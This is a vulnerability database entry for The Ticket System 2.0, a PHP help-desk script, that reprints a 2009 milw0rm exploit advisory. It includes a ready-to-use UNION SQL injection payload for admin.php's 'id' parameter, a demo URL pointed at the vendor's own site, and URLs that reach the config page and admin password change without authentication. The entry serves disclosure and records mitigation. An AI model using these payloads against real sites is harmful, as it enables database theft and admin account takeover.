MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities

vendor:

The Ticket System

by:

ThE g0bL!N

7,5

CVSS

HIGH

SQL Injection and Config Information Disclousr

89, 200

CWE

Product Name: The Ticket System

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: a:mrcgiguy:the_ticket_system:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities

An attacker can exploit these vulnerabilities by sending a specially crafted SQL code to the vulnerable parameter 'id' in the 'admin.php' script and by accessing the 'admin.php?action=editconfig' and 'admin.php?action=editop&id=1' scripts respectively.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Access to the vulnerable scripts should be restricted.

Source

Exploit-DB raw data:

MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://www.mrcgiguy.com
Special Thx:  All Muslims All Members Of Team Algerien Of FootBall
Note: Algerie 3-1 Egypt
Exploit:
------
SQL INJECTION:
-------------
http://wwww.victim.com/admin.php?action=viewticket&id=[ SQL CODE]
[ SQL CODE]=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
Demo:
----
http://www.mrcgiguy.com/tts/admin.php?action=viewticket&id=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
Note : The exploit Worked out of enter The Right information of admin :)
2) Config Information Disclousr: (out of cookies)
--------------------------------------------------
go to url:
---------
http://victim/tts/admin.php?action=editconfig
Admin Change Password:
*--------------------
http://victim.com/path/admin.php?action=editop&id=1

# milw0rm.com [2009-06-09]